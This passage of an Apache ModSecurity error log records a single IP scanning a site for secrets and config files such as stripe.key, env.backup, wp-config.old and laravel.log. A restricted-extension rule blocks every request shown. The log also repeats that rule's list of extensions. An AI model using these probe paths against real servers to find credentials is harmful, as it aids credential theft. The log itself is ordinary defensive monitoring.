185.177.72.50:44810] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "ab3TFZlj0-aQnXOSFX--wQAAAwQ"] [Sat Mar 21 01:07:01.152975 2026] [:error] [pid 25090:tid 25147] [client 185.177.72.50:47076] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "ab3TFc8oNmzkT9Qwc5JRrgAAAkQ"] [Sat Mar 21 01:07:01.176513 2026] [:error] [pid 17713:tid 17799] [client 185.177.72.50:47662] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "ab3TFeWNdVzdR4d4e6ZLlQAAAQk"] [Sat Mar 21 01:07:01.215990 2026] [:error] [pid 17713:tid 17803] [client 185.177.72.50:47662] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "ab3TFeWNdVzdR4d4e6ZLlgAAAQ0"] [Sat Mar 21 01:07:01.237284 2026] [:error] [pid 25090:tid 25169] [client 185.177.72.50:48044] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "ab3TFc8oNmzkT9Qwc5JRswAAAk0"] [Sat Mar 21 01:07:01.349156 2026] [:error] [pid 17713:tid 17795] [client 185.177.72.50:47662] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "ab3TFeWNdVzdR4d4e6ZLmAAAAQU"] [Sat Mar 21 01:07:01.426611 2026] [:error] [pid 14425:tid 14437] [client 185.177.72.50:47824] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "ab3TFUMqeKc_GzeuAXAWiwAAAMo"] [Sat Mar 21 01:07:01.506605 2026] [:error] [pid 28293:tid 28451] [client 185.177.72.50:48300] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "ab3TFVzRzwA7ZPVn5cgHTwAAA8g"] [Sat Mar 21 03:05:30.605146 2026] [:error] [pid 25090:tid 25163] [client 216.73.216.120:8387] [client 216.73.216.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "68"] [id "960006"] [rev "1"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA"] [hostname "web.dev-unit.com"] [uri "/robots.txt"] [unique_id "ab3u2s8oNmzkT9Qwc5JAqQAAAkw"] [Sat Mar 21 03:20:05.336856 2026] [:error] [pid 27949:tid 28003] [client 216.73.216.120:61950] [client 216.73.216.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^$" at REQUEST_HEADERS:user-agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "68"] [id "960006"] [rev "1"] [msg "Empty User Agent Header"] [severity "NOTICE"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA"] [hostname "www.web.dev-unit.com"] [uri "/robots.txt"] [unique_id "ab3yRXOsYaeu26ps-LDoTwAAAsg"] [Sat Mar 21 07:01:09.048376 2026] [:error] [pid 15423:tid 15642] [client 185.177.72.50:54644] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.backup"] [unique_id "ab4mFe4e17Bf6FBmBRtzkgAAAQc"] [Sat Mar 21 07:01:13.875083 2026] [:error] [pid 12396:tid 12413] [client 185.177.72.50:54598] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-config.old"] [unique_id "ab4mGfYjPxdw8MDv8uX4CgAAAUs"] [Sat Mar 21 07:01:13.941616 2026] [:error] [pid 12396:tid 12405] [client 185.177.72.50:54598] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "ab4mGfYjPxdw8MDv8uX4CwAAAUM"] [Sat Mar 21 07:01:15.552250 2026] [:error] [pid 15423:tid 15639] [client 185.177.72.50:54380] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.key"] [unique_id "ab4mG-4e17Bf6FBmBRt0agAAAQY"] [Sat Mar 21 07:01:16.477806 2026] [:error] [pid 15423:tid 15664] [client 185.177.72.50:54644] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.log"] [unique_id "ab4mHO4e17Bf6FBmBRt0jgAAARg"] [Sat Mar 21 07:01:16.486600 2026] [:error] [pid 12396:tid 12422] [client 185.177.72.50:54598] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.conf"] [unique_id "ab4mHPYjPxdw8MDv8uX4UgAAAVQ"] [Sat Mar 21 07:01:16.590560 2026] [:error] [pid 15423:tid 15635] [client 185.177.72.50:54380] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.ini"] [unique_id "ab4mHO4e17Bf6FBmBRt0kwAAAQQ"] [Sat Mar 21 07:01:16.606287 2026] [:error] [pid 12396:tid 12425] [client 185.177.72.50:54598] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.bak"] [unique_id "ab4mHPYjPxdw8MDv8uX4VAAAAVc"] [Sat Mar 21 07:01:16.628991 2026] [:error] [pid 15423:tid 15646] [client 185.177.72.50:54380] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.old"] [unique_id "ab4mHO4e17Bf6FBmBRt0lAAAAQo"] [Sat Mar 21 07:01:16.874645 2026] [:error] [pid 15423:tid 15635] [client 185.177.72.50:54390] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.backup"] [unique_id "ab4mHO4e17Bf6FBmBRt0mAAAAQQ"] [Sat Mar 21 07:01:21.061120 2026] [:error] [pid 12396:tid 12426] [client 185.177.72.50:4856] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config.inc"] [unique_id "ab4mIfYjPxdw8MDv8uX4zQAAAVg"] [Sat Mar 21 07:01:23.700731 2026] [:error] [pid 15423:tid 15639] [client 185.177.72.50:54644] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "ab4mI-4e17Bf6FBmBRt1RAAAAQY"] [Sat Mar 21 07:01:23.721758 2026] [:error] [pid 15423:tid 15651] [client 185.177.72.50:54390] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "ab4mI-4e17Bf6FBmBRt1RgAAAQ4"] [Sat Mar 21 07:01:23.767462 2026] [:error] [pid 3637:tid 3770] [client 185.177.72.50:4648] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] 